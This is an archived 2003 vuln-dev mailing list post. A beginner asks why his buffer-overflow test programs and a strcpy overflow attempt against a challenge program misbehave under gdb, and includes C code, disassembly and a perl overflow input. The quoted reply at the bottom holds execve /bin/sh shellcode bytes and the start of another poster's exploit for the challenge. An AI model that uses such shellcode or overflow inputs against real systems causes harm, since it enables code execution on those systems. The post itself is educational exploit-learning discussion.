Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting
Mailing Lists: securityfocus.com > vuln-dev > 03 > 050506.html (Request Expert securityfocus.com Support)

N00b questions :\

From: Diode Trnasistor <ffddfe(at)yahoo.com>
Date: Sat May 24 2003 - 19:52:52 EDT


Playing with these challenges (and thanx so much for posting these) i came across some things which aren't so clear and i'm hoping someone can explain them to me.

I wrote a simple program i was hoping will demonstrate the standard stack based overflow for me. It looks like this:

void main() {

    char buffer[12];
    char longbuffer[30];
    int i;

    memset(longbuffer, 'A', 30);
    longbuffer[29] = 0;

    strcpy(buffer, longbuffer);
}

After compilation, inside gdb, disassemble main i get this: 

0x8048440 
:       push   %ebp
0x8048441 :     mov    %esp,%ebp
0x8048443 :     sub    $0x38,%esp
0x8048446 :     add    $0xfffffffc,%esp
...etc etc.

Now up untill main+3 it makes sense. Why is this enormous number being added to stack pointer is beyond me. Shouldn't this completelly ruin the stack? Doesn't the stack start at the highest adress and grow down? WTF?

Do you need help?X

Moving on i write another sample program: void function(int i, int b, int c) {

    char buffer[12];
    char buffer2[5];

    return;
}

int main(void) {

    function(1, 2, 3);
    return 0;
}

disassemble function with gdb yields: 

0x80483d0 :   push   %ebp
0x80483d1 : mov    %esp,%ebp
0x80483d3 : sub    $0x28,%esp
...etc etc
WTF?! ok so it sets up a new stack frame and then makes room for the local auto variables. Now i'm not very good at math but last i checked 12 + 8 made 20. Not 40. Again, WTF? Is gentoo using unicode or something crazy like that? God i cry...

Moving on, i try to abuse the obvious strcpy in vulndev2.c, so i run it with obvious
(gdb) run `perl -e 'print "A"x200'` two

And what happens? Segmentation fault 0x41414141 in strcpy? Hell no! I get a completelly baffling: Segmentation fault.
0x40085013 in _IO_getline_info () from /lib/libc.so.6

Do you need more help?X

0x40085013? _IO_getline_info? Where did that come from? Looking at begining of vulndev2.c..

main(int argc, char *argv[])
{ 

        char    *bfp;
        char    buf[BFSIZE];
        FILE    *f1;

I'd assume that buf was on the stack. Why doesn't writing WAY past the end of this buffer cause a jump to 41414141? I am SO confused HALP!

PS: i'm a n00b :\

  • "D." <dugely@yahoo.com> wrote:
    > Hello vuln-dev!
    > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    >
    > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    > "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    >
    > char sploit1[2000];
    > char sploit2[100];
    > int i, ADDR_OF_BUF, *tp;
    >
    > printf("\n[*] vulndev2.c sploit by Doug Hoyte:
    > www.hypervivid.com\n\n");
    >
    > if (argc != 3) {

Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo. http://search.yahoo.com Received on Sat May 24 20:17:16 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT

Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library